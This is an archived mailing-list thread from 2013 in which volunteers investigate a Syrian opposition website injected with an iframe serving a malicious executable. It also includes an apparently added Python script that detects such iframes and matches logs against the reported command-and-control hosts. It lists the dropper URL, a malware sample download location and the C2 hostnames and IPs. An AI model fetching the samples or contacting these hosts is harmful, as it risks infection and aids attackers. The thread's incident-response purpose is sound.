Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread hadi
Many thanks for posting. I'll spread this to my Syrian friends just to be aware of this. All the best, Hadi On 01/29/2013 11:05 PM, KheOps wrote: Dear Libtech, We just saw that the website : http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread KheOps
Hello, I wrote a first summary on the case, I will try to keep it up to date with new data, https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/ All the best, KheOps On 30/01/2013 00:00, SiNA Rabbani wrote: Hi! I sent the

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus - UPDATE

2013-01-30 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Dear List, Here are more details with credit to: Team Cymru: http://www.team-cymru.org/ CC nodes for this version: melaniibaby.no-ip.biz 173.0.10.52 ghostsx.8866.org 192.168.11.1 (so not likely to connect) awrasx10.no-ip.biz 95.170.198.155

[liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Dear Libtech, We just saw that the website : http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame which links to a .exe file which is detected as a virus by antivirus software: http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe The

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hey, On 29/01/2013 23:34, SiNA Rabbani wrote: This is the malware: https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ Yes, saw that too. However, I don't find any precise description of its behaviour. Like, what it does, if it opens

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread Andrew Lewis
Just a heads up, the site's been taken down, malware is here: https://resources.telecomix.ceops.eu/material/malwares/ Also looking at getting access to the server in question for forensics. -Andrew On Jan 30, 2013, at 11:34 AM, SiNA Rabbani s...@redteam.io wrote: -BEGIN PGP SIGNED

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Ok. I infected an old Windows XP with this malware and it keeps sending SYN requests to this hostname: awrasx10.no-ip.biz which currently resolved to: 37.236.124.197 and is down for me. - --SiNA Internet Protocol Version 4, Src: 10.10.10.17
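The two indicators the thread gives are (a) an iframe injected into every page that points at a .exe on a third-party host, and (b) an infected host repeatedly sending SYNs to a dynamic-DNS C2 name. The following is an added example, not code posted by anyone in the thread, of how a responder could sweep for both: it parses HTML for iframes that point at an executable, sit on a host other than the site itself, or are sized to be invisible, and it matches a connection log against the C2 hostnames and IPs quoted above. The sample page, the log lines, the log format and the port number are constructed for illustration; the hostnames, IPs and the dropper URL are the ones reported in the thread.

```python
"""IOC sweep for a drive-by compromise of the kind reported in this thread.
Added example: sample HTML, log lines, log format and port are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# C2 hosts and IPs quoted in the thread (SiNA Rabbani / Team Cymru data)
C2_HOSTS = {"awrasx10.no-ip.biz", "melaniibaby.no-ip.biz", "ghostsx.8866.org"}
C2_IPS = {"37.236.124.197", "95.170.198.155", "173.0.10.52"}
# Assumption: extensions Windows will execute when the iframe is served
EXE_EXT = (".exe", ".scr", ".com", ".pif")


class IframeCollector(HTMLParser):
    """Collects src/width/height of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            a = dict(attrs)
            self.iframes.append({"src": a.get("src") or "",
                                 "width": a.get("width"),
                                 "height": a.get("height")})


def suspicious_iframes(html, site_host):
    """Return [(src, [reasons])] for iframes that look injected."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for f in parser.iframes:
        u = urlparse(f["src"])
        reasons = []
        if u.path.lower().endswith(EXE_EXT):
            reasons.append("points at an executable")
        if u.hostname and u.hostname.lower() != site_host.lower():
            reasons.append("off-site host %s" % u.hostname)
        if f["width"] in ("0", "1") or f["height"] in ("0", "1"):
            reasons.append("hidden (zero/one-pixel) frame")
        if reasons:
            hits.append((f["src"], reasons))
    return hits


def c2_contacts(log_lines):
    """Match connection-log lines against the thread's C2 IOCs.
    Assumed log format: '<ts> <src_ip> -> <dst_host_or_ip>:<port> <flags>'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 5 or parts[2] != "->":
            continue  # skip lines that do not follow the assumed format
        dst, _, port = parts[3].rpartition(":")
        if dst.lower() in C2_HOSTS or dst in C2_IPS:
            hits.append((dst, port, parts[4]))
    return hits


# Constructed sample page: one legitimate frame, one injected dropper frame
SAMPLE_HTML = """<html><body><h1>News</h1>
<iframe src="http://www.syrian-martyrs.com/news.html" width="600" height="400"></iframe>
<iframe src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe" width="0" height="0"></iframe>
</body></html>"""

# Constructed log lines modelled on the SYN pattern described in the thread
SAMPLE_LOG = [
    "2013-01-30T02:02:10 10.10.10.17 -> awrasx10.no-ip.biz:5555 SYN",
    "2013-01-30T02:02:13 10.10.10.17 -> awrasx10.no-ip.biz:5555 SYN",
    "2013-01-30T02:02:14 10.10.10.17 -> www.example.com:80 SYN",
    "2013-01-30T02:02:15 10.10.10.17 -> 37.236.124.197:5555 SYN",
]

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_HTML, "www.syrian-martyrs.com"):
        print("iframe", src, "->", "; ".join(why))
    for dst, port, flags in c2_contacts(SAMPLE_LOG):
        print("C2 contact", dst, port, flags)
```

The iframe check deliberately flags on any one of the three signals, since a real injection may use a visible frame or a same-site path; the log matcher treats the dynamic-DNS name and its current IP separately because, as the thread shows, the name was re-pointed between observations.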

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hello, On 30/01/2013 03:02, SiNA Rabbani wrote: Ok. I infected an old Windows XP with this malware and it keeps sending SYN requests to this hostname: awrasx10.no-ip.biz which currently resolved to: 37.236.124.197 and is down for me. Thank you for your work :) The hostname still resolves